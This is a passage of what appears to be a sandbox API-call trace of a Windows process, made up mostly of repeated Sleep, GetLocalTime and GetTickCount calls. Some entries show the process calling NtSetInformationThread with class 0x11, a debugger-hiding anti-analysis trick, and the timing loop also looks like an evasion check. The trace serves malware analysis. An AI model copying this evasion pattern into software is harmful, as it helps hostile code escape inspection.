Sleep (dwMilliseconds=0x3e8) [0128.521] Sleep (dwMilliseconds=0x3e8) [0128.570] Sleep (dwMilliseconds=0x3e8) [0128.620] Sleep (dwMilliseconds=0x3e8) [0128.672] Sleep (dwMilliseconds=0x3e8) [0128.722] Sleep (dwMilliseconds=0x3e8) [0128.771] Sleep (dwMilliseconds=0x3e8) [0128.834] Sleep (dwMilliseconds=0x3e8) [0128.903] Sleep (dwMilliseconds=0x3e8) [0128.973] Sleep (dwMilliseconds=0x3e8) [0129.056] Sleep (dwMilliseconds=0x3e8) [0129.133] Sleep (dwMilliseconds=0x3e8) [0129.212] Sleep (dwMilliseconds=0x3e8) [0129.284] Sleep (dwMilliseconds=0x3e8) [0129.401] Sleep (dwMilliseconds=0x3e8) [0129.473] Sleep (dwMilliseconds=0x3e8) [0129.563] Sleep (dwMilliseconds=0x3e8) [0129.598] Sleep (dwMilliseconds=0x3e8) [0129.679] Sleep (dwMilliseconds=0x3e8) [0129.762] Sleep (dwMilliseconds=0x3e8) [0129.850] Sleep (dwMilliseconds=0x3e8) [0129.913] Sleep (dwMilliseconds=0x3e8) [0129.963] Sleep (dwMilliseconds=0x3e8) [0130.015] Sleep (dwMilliseconds=0x3e8) [0130.064] Sleep (dwMilliseconds=0x3e8) [0130.114] Sleep (dwMilliseconds=0x3e8) [0130.166] Sleep (dwMilliseconds=0x3e8) [0130.223] Sleep (dwMilliseconds=0x3e8) [0130.273] Sleep (dwMilliseconds=0x3e8) [0130.327] Sleep (dwMilliseconds=0x3e8) [0130.398] Sleep (dwMilliseconds=0x3e8) [0130.448] Sleep (dwMilliseconds=0x3e8) [0130.500] Sleep (dwMilliseconds=0x3e8) [0130.551] Sleep (dwMilliseconds=0x3e8) [0130.714] Sleep (dwMilliseconds=0x3e8) [0130.818] Sleep (dwMilliseconds=0x3e8) [0130.924] Sleep (dwMilliseconds=0x3e8) [0130.976] Sleep (dwMilliseconds=0x3e8) [0131.029] Sleep (dwMilliseconds=0x3e8) [0131.084] Sleep (dwMilliseconds=0x3e8) [0131.135] Sleep (dwMilliseconds=0x3e8) [0131.187] Sleep (dwMilliseconds=0x3e8) [0131.251] Sleep (dwMilliseconds=0x3e8) [0131.333] Sleep (dwMilliseconds=0x3e8) [0131.417] Sleep (dwMilliseconds=0x3e8) [0131.505] Sleep (dwMilliseconds=0x3e8) [0131.612] Sleep (dwMilliseconds=0x3e8) [0131.710] Sleep (dwMilliseconds=0x3e8) [0131.796] Sleep (dwMilliseconds=0x3e8) [0131.883] Sleep (dwMilliseconds=0x3e8) [0131.968] Sleep (dwMilliseconds=0x3e8) [0132.024] GetLocalTime (in: lpSystemTime=0x397ff4c | out: lpSystemTime=0x397ff4c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x25, wMilliseconds=0x182)) [0132.024] Sleep (dwMilliseconds=0x3e8) [0132.075] Sleep (dwMilliseconds=0x3e8) [0132.119] Sleep (dwMilliseconds=0x3e8) [0132.164] Sleep (dwMilliseconds=0x3e8) [0132.228] Sleep (dwMilliseconds=0x3e8) [0132.262] Sleep (dwMilliseconds=0x3e8) [0132.374] Sleep (dwMilliseconds=0x3e8) [0132.469] Sleep (dwMilliseconds=0x3e8) [0132.550] Sleep (dwMilliseconds=0x3e8) [0132.650] Sleep (dwMilliseconds=0x3e8) [0132.707] Sleep (dwMilliseconds=0x3e8) [0132.766] Sleep (dwMilliseconds=0x3e8) [0132.829] Sleep (dwMilliseconds=0x3e8) [0132.888] Sleep (dwMilliseconds=0x3e8) [0132.945] Sleep (dwMilliseconds=0x3e8) [0132.998] Sleep (dwMilliseconds=0x3e8) [0133.190] Sleep (dwMilliseconds=0x3e8) [0133.341] Sleep (dwMilliseconds=0x3e8) [0133.508] Sleep (dwMilliseconds=0x3e8) [0133.625] Sleep (dwMilliseconds=0x3e8) [0133.743] Sleep (dwMilliseconds=0x3e8) [0133.819] Sleep (dwMilliseconds=0x3e8) [0133.871] Sleep (dwMilliseconds=0x3e8) [0133.930] Sleep (dwMilliseconds=0x3e8) [0134.024] Sleep (dwMilliseconds=0x3e8) [0134.090] Sleep (dwMilliseconds=0x3e8) [0134.249] Sleep (dwMilliseconds=0x3e8) Thread: id = 3 os_tid = 0xf60 [0082.860] GetCurrentThreadId () returned 0xf60 [0082.860] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x8, wMilliseconds=0x307)) [0082.860] GetTickCount () returned 0x1d034fd [0082.860] Sleep (dwMilliseconds=0x3e8) [0084.459] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x9, wMilliseconds=0x373)) [0084.459] GetTickCount () returned 0x1d03951 [0084.459] Sleep (dwMilliseconds=0x3e8) [0085.626] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0xa, wMilliseconds=0x381)) [0085.627] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0085.627] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0085.627] GetCurrentThread () returned 0xfffffffe [0085.627] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0085.627] GetTickCount () returned 0x1d03d47 [0085.628] Sleep (dwMilliseconds=0x3e8) [0088.684] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0xb, wMilliseconds=0x3cd)) [0088.684] GetTickCount () returned 0x1d0417b [0088.684] Sleep (dwMilliseconds=0x3e8) [0089.732] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0xd, wMilliseconds=0x3)) [0089.733] GetTickCount () returned 0x1d04581 [0089.733] Sleep (dwMilliseconds=0x3e8) [0090.792] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0xe, wMilliseconds=0x40)) [0090.792] GetTickCount () returned 0x1d049a6 [0090.793] Sleep (dwMilliseconds=0x3e8) [0091.938] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0xf, wMilliseconds=0xca)) [0091.939] GetTickCount () returned 0x1d04e19 [0091.939] Sleep (dwMilliseconds=0x3e8) [0093.150] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x10, wMilliseconds=0x1a3)) [0093.150] GetTickCount () returned 0x1d052d9 [0093.150] Sleep (dwMilliseconds=0x3e8) [0094.295] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x11, wMilliseconds=0x22e)) [0094.295] GetTickCount () returned 0x1d0574c [0094.296] Sleep (dwMilliseconds=0x3e8) [0095.970] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x12, wMilliseconds=0x3d2)) [0101.917] GetTickCount () returned 0x1d06c81 [0101.917] Sleep (dwMilliseconds=0x3e8) [0102.932] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x18, wMilliseconds=0x1)) [0103.165] GetTickCount () returned 0x1d07113 [0103.165] Sleep (dwMilliseconds=0x3e8) [0104.195] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x19, wMilliseconds=0xba)) [0104.195] GetTickCount () returned 0x1d07519 [0104.195] Sleep (dwMilliseconds=0x3e8) [0105.224] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x1a, wMilliseconds=0xd8)) [0105.740] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0105.740] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0105.740] GetCurrentThread () returned 0xfffffffe [0105.740] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0105.996] GetTickCount () returned 0x1d07ad3 [0105.996] Sleep (dwMilliseconds=0x3e8) [0107.284] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x1b, wMilliseconds=0x346)) [0107.284] GetTickCount () returned 0x1d07f75 [0107.385] Sleep (dwMilliseconds=0x3e8) [0112.007] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x1e, wMilliseconds=0x286)) [0112.236] GetTickCount () returned 0x1d08aca [0112.236] Sleep (dwMilliseconds=0x3e8) [0114.836] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x1f, wMilliseconds=0x302)) [0114.837] GetTickCount () returned 0x1d08ed0 [0114.837] Sleep (dwMilliseconds=0x3e8) [0118.095] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x20, wMilliseconds=0x310)) [0118.095] GetTickCount () returned 0x1d092c6 [0118.095] Sleep (dwMilliseconds=0x3e8) [0121.150] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x21, wMilliseconds=0x33d)) [0121.150] GetTickCount () returned 0x1d096db [0121.150] Sleep (dwMilliseconds=0x3e8) [0124.617] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x22, wMilliseconds=0x34b)) [0124.617] GetTickCount () returned 0x1d09ad1 [0124.617] Sleep (dwMilliseconds=0x3e8) [0127.769] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x23, wMilliseconds=0x359)) [0127.770] GetTickCount () returned 0x1d09ec7 [0127.770] Sleep (dwMilliseconds=0x3e8) [0130.499] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x24, wMilliseconds=0x367)) [0130.499] GetTickCount () returned 0x1d0a2bd [0130.499] Sleep (dwMilliseconds=0x3e8) [0130.550] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x24, wMilliseconds=0x376)) [0130.550] GetTickCount () returned 0x1d0a6b4 [0130.550] Sleep (dwMilliseconds=0x3e8) [0130.664] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x24, wMilliseconds=0x3c4)) [0130.975] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0130.975] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0130.975] GetCurrentThread () returned 0xfffffffe [0130.975] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0130.975] GetTickCount () returned 0x1d0ab46 [0130.975] Sleep (dwMilliseconds=0x3e8) [0131.028] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x25, wMilliseconds=0x4a)) [0131.028] GetTickCount () returned 0x1d0af3d [0131.028] Sleep (dwMilliseconds=0x3e8) [0131.084] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x25, wMilliseconds=0x59)) [0131.084] GetTickCount () returned 0x1d0b333 [0131.084] Sleep (dwMilliseconds=0x3e8) [0131.134] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x25, wMilliseconds=0x69)) [0131.135] GetTickCount () returned 0x1d0b73a [0131.135] Sleep (dwMilliseconds=0x3e8) [0131.187] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x25, wMilliseconds=0x88)) [0131.187] GetTickCount () returned 0x1d0bb30 [0131.187] Sleep (dwMilliseconds=0x3e8) [0131.251] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x25, wMilliseconds=0x98)) [0131.251] GetTickCount () returned 0x1d0bf27 [0131.251] Sleep (dwMilliseconds=0x3e8) [0131.333] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x25, wMilliseconds=0xa7)) [0131.333] GetTickCount () returned 0x1d0c31d [0131.333] Sleep (dwMilliseconds=0x3e8) [0131.416] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x25, wMilliseconds=0xb7)) [0131.417] GetTickCount () returned 0x1d0c714 [0131.417] Sleep (dwMilliseconds=0x3e8) [0131.504] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x25, wMilliseconds=0xc6)) [0131.505] GetTickCount () returned 0x1d0cb0b [0131.505] Sleep (dwMilliseconds=0x3e8) [0131.612] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x25, wMilliseconds=0xe6)) [0131.612] GetTickCount () returned 0x1d0cf11 [0131.612] Sleep (dwMilliseconds=0x3e8) [0131.708] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x25, wMilliseconds=0xf5)) [0131.709] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0131.710] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0131.710] GetCurrentThread () returned 0xfffffffe [0131.710] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0131.710] GetTickCount () returned 0x1d0d307 [0131.710] Sleep (dwMilliseconds=0x3e8) [0131.796] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x25, wMilliseconds=0x114)) [0131.796] GetTickCount () returned 0x1d0d70e [0131.796] Sleep (dwMilliseconds=0x3e8) [0131.882] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x25, wMilliseconds=0x124)) [0131.882] GetTickCount () returned 0x1d0db04 [0131.882] Sleep (dwMilliseconds=0x3e8) [0131.968] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x25, wMilliseconds=0x143)) [0131.968] GetTickCount () returned 0x1d0df0a [0131.968] Sleep (dwMilliseconds=0x3e8) [0132.023] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x25, wMilliseconds=0x182)) [0132.023] GetTickCount () returned 0x1d0e330 [0132.023] Sleep (dwMilliseconds=0x3e8) [0132.074] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x25, wMilliseconds=0x1b0)) [0132.075] GetTickCount () returned 0x1d0e746 [0132.075] Sleep (dwMilliseconds=0x3e8) [0132.118] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x25, wMilliseconds=0x1df)) [0132.119] GetTickCount () returned 0x1d0eb5b [0132.119] Sleep (dwMilliseconds=0x3e8) [0132.164] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x25, wMilliseconds=0x20e)) [0132.164] GetTickCount () returned 0x1d0ef71 [0132.164] Sleep (dwMilliseconds=0x3e8) [0132.227] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x25, wMilliseconds=0x24c)) [0132.227] GetTickCount () returned 0x1d0f397 [0132.227] Sleep (dwMilliseconds=0x3e8) [0132.262] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x25, wMilliseconds=0x26c)) [0132.262] GetTickCount () returned 0x1d0f79d [0132.262] Sleep (dwMilliseconds=0x3e8) [0132.372] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x25, wMilliseconds=0x29a)) [0132.373] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0132.373] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0132.373] GetCurrentThread () returned 0xfffffffe [0132.373] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0132.374] GetTickCount () returned 0x1d0fbb3 [0132.374] Sleep (dwMilliseconds=0x3e8) [0132.468] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x25, wMilliseconds=0x2aa)) [0132.468] GetTickCount () returned 0x1d0ffa9 [0132.468] Sleep (dwMilliseconds=0x3e8) [0132.549] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x25, wMilliseconds=0x2ba)) [0132.550] GetTickCount () returned 0x1d103a0 [0132.550] Sleep (dwMilliseconds=0x3e8) [0132.649] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x25, wMilliseconds=0x2d9)) [0132.649] GetTickCount () returned 0x1d107a6 [0132.649] Sleep (dwMilliseconds=0x3e8) [0132.707] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x25, wMilliseconds=0x2e8)) [0132.707] GetTickCount () returned 0x1d10b9d [0132.707] Sleep (dwMilliseconds=0x3e8) [0132.766] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x25, wMilliseconds=0x308)) [0132.766] GetTickCount () returned 0x1d10fa3 [0132.766] Sleep (dwMilliseconds=0x3e8) [0132.829] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x25, wMilliseconds=0x327)) [0132.829] GetTickCount () returned 0x1d113a9 [0132.829] Sleep (dwMilliseconds=0x3e8) [0132.887] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x25, wMilliseconds=0x346)) [0132.888] GetTickCount () returned 0x1d117af [0132.888] Sleep (dwMilliseconds=0x3e8) [0132.945] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x25, wMilliseconds=0x365)) [0132.945] GetTickCount () returned 0x1d11bb5 [0132.945] Sleep (dwMilliseconds=0x3e8) [0132.998] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x25, wMilliseconds=0x375)) [0132.998] GetTickCount () returned 0x1d11fac [0132.998] Sleep (dwMilliseconds=0x3e8) [0133.187] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x26, wMilliseconds=0xa)) [0133.188] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0133.188] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0133.189] GetCurrentThread () returned 0xfffffffe [0133.189] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0133.190] GetTickCount () returned 0x1d12410 [0133.190] Sleep (dwMilliseconds=0x3e8) [0133.340] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x26, wMilliseconds=0x67)) [0133.340] GetTickCount () returned 0x1d12854 [0133.340] Sleep (dwMilliseconds=0x3e8) [0133.505] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x26, wMilliseconds=0xf4)) [0133.508] GetTickCount () returned 0x1d12cc8 [0133.508] Sleep (dwMilliseconds=0x3e8) [0133.624] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x26, wMilliseconds=0x142)) [0133.624] GetTickCount () returned 0x1d130fd [0133.624] Sleep (dwMilliseconds=0x3e8) [0133.742] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x26, wMilliseconds=0x19f)) [0133.742] GetTickCount () returned 0x1d13541 [0133.743] Sleep (dwMilliseconds=0x3e8) [0133.819] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x26, wMilliseconds=0x1ce)) [0133.819] GetTickCount () returned 0x1d13957 [0133.819] Sleep (dwMilliseconds=0x3e8) [0133.871] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x26, wMilliseconds=0x1de)) [0133.871] GetTickCount () returned 0x1d13d4e [0133.871] Sleep (dwMilliseconds=0x3e8) [0133.930] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x26, wMilliseconds=0x1fd)) [0133.930] GetTickCount () returned 0x1d14154 [0133.930] Sleep (dwMilliseconds=0x3e8) [0134.024] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x26, wMilliseconds=0x23b)) [0134.024] GetTickCount () returned 0x1d14579 [0134.024] Sleep (dwMilliseconds=0x3e8) [0134.089] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: lpSystemTime=0x3b7ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x26, wMilliseconds=0x25a)) [0134.090] GetTickCount () returned 0x1d14980 [0134.090] Sleep (dwMilliseconds=0x3e8) [0134.171] GetLocalTime (in: lpSystemTime=0x3b7ff0c | out: 